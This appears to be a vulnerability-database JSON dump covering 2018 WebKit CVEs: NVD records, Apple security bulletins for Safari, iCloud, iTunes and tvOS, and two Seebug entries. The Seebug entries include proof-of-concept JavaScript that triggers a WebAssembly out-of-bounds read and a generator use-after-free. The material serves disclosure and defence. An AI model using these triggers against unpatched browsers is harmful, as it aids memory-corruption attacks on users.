"title": "CVE-2018-4218", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4218"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4218", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-12-09T20:25:43", "description": "An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch.", "edition": 13, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-08T18:29:00", "title": "CVE-2018-4190", "type": "cve", "cwe": ["CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4190"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2018-4190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4190", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*"]}], "seebug": [{"lastseen": "2018-06-10T09:46:29", "description": "There is an out-of-bounds read when compiling WebAssembly source buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the functuion getWasmBufferFromValue. This function returns the code buffer as follows:\r\n```\r\nreturn arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());\r\n```\r\nIf the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as follows:\r\n```\r\nmemcpy(result.data(), data + byteOffset, byteSize);\r\n```\r\nThis means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either though parsing exceptions or data sections when they are copied. A minimal PoC for the issue is:\r\n```\r\nvar b2 = new ArrayBuffer(1000);\r\nvar view = new Int8Array(b2, 700);\r\nvar mod = new WebAssembly.Module(a);\r\n```\r\n\r\nAn HTML file the consistently crashes Safari is attached.", "published": "2018-06-08T00:00:00", "type": "seebug", "title": "WebKit: Info leak in WebAssembly Compilation(CVE-2018-4222)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4222"], "modified": "2018-06-08T00:00:00", "id": "SSV:97335", "href": "https://www.seebug.org/vuldb/ssvid-97335", "sourceData": "\n <html><body><script>\r\nfor(var q = 0; q < 100; q++){\r\nvar i = Math.random();\r\ni = Math.round(i*0x20000000);\r\ni = Math.abs(i);\r\nvar b2 = new Uint8Array( i);\r\nconsole.log(\"i\" + i);\r\nvar j = Math.random();\r\nj = j*i;\r\nj = Math.round(j);\r\nj = Math.abs(j);\r\nconsole.log(\"j\"+j)\r\nvar view2 = new DataView(b2.buffer,j);\r\ntry{\r\nvar mod = new WebAssembly.Module(view2);\r\n}catch(e){\r\nconsole.log(e);\r\n}\r\n}\r\n</script></body></html>\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97335"}, {"lastseen": "2018-06-08T07:11:41", "description": "In WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:\r\n```\r\n var state = this.@generatorState;\r\n```\r\nand set by calling:\r\n```\r\n generator.@generatorState = @GeneratorStateExecuting;\r\n```\r\n\r\nChecking that the @generator property is set is also used in place of type checking the generator.\r\n\r\nTherefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.\r\n\r\nIt is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.\r\n\r\nGenerators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.\r\n\r\nA minimal sample of the script causing this problem is below, and a full PoC is attached.\r\n```\r\nvar iterator;\r\n\r\nvar a = [];\r\n\r\nfunction* foo(index) {\r\n\r\n while (1) {\r\n var q = a.pop();\r\n if(q){\r\n \tq.__proto__ = iterator;\r\n \t q.next();\r\n }\r\n yield index++;\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n yield;\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){ // make a few objects with @generatorState set\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n\r\niterator = foo(0);\r\n\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next().value);\r\n```", "published": "2018-06-08T00:00:00", "type": "seebug", "title": "WebKit: Use-after-free when resuming generator(CVE-2018-4218)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4218"], "modified": "2018-06-08T00:00:00", "id": "SSV:97334", "href": "https://www.seebug.org/vuldb/ssvid-97334", "sourceData": "\n <html><body><script>\r\nprint = console.log;\r\nprint(\"top\");\r\nvar iterator;\r\nvar o = function(){print(\"hello\")};\r\nvar a = [];\r\nfunction* foo(index) {\r\n //print(\"start\");\r\n\r\n while (1) {\r\n //if(index == 77){\r\n // o = 0;\r\n // gc(); \r\n//\tindex = 2;\r\n // var a = [1, 2, 3, 4];\r\n\t//yield 9;\r\n //print(\"a vale \" + a[0]);\r\n //}\r\n //if(index == 1){\r\n //index = 77;\r\n // print(\"INTERNAL CALL\")\r\n // iterator.next();\r\n //index++;\r\n\r\n //}\r\n //var b = [1, 2, 3, 4];\r\n var q = a.pop();\r\n if(q){\r\n print(\"here1\");\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n //print(\"bval\" + b[0]);\r\n }\r\n}\r\n\r\nfunction* foo2(){\r\n\r\n yield;\r\n\r\n}\r\n\r\nvar temp = foo2(0);\r\n\r\nfor(var i = 0; i < 10; i++){\r\n\r\n\tvar q = {};\r\n\tq.__proto__ = temp;\r\n\tq.next();\r\n\tq.__proto__ = {};\r\n\ta.push(q);\r\n\r\n}\r\n//print(a);\r\niterator = foo(0);\r\n\r\n\r\n// expected output: 0\r\n\r\n\r\n\r\n\r\no.__proto__ = iterator;\r\n//print(\"FIRST CALL\")\r\n//print(o.next().value);\r\n//print(\"SECOND CALL\")\r\n//print(o.next().value);\r\n//print(\"THIRD CALL\")\r\n\r\nfor(var i = 0; i < 10; i++){\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next(\"hello\").value);\r\n}\r\n\r\n//print(\"FOURTH CALL\")\r\n//print(iterator.next().value);\r\no();\r\n</script></body></html>\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-97334"}], "apple": [{"lastseen": "2020-12-24T20:41:58", "bulletinFamily": "software", "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4277", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.1.1\n\nReleased June 1, 2018\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4205: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\nEntry added July 10, 2018\n", "edition": 2, "modified": "2019-10-08T03:41:58", "published": "2019-10-08T03:41:58", "id": "APPLE:HT208854", "href": "https://support.apple.com/kb/HT208854", "title": "About the security content of Safari 11.1.1 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:58", "bulletinFamily": "software", "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.5\n\nReleased June 1, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:48:52", "published": "2019-10-08T03:48:52", "id": "APPLE:HT208853", "href": "https://support.apple.com/kb/HT208853", "title": "About the security content of iCloud for Windows 7.5 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:45", "bulletinFamily": "software", "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4145", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.5 for Windows\n\nReleased May 29, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4145: found by OSS-Fuzz\n\nEntry added October 18, 2018\n", "edition": 2, "modified": "2019-10-08T03:44:36", "published": "2019-10-08T03:44:36", "id": "APPLE:HT208852", "href": "https://support.apple.com/kb/HT208852", "title": "About the security content of iTunes 12.7.5 for Windows - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:43", "bulletinFamily": "software", "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4188", "CVE-2018-4187", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4232", "CVE-2018-4243", "CVE-2018-4200"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: Apple TV 4K\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted message may lead 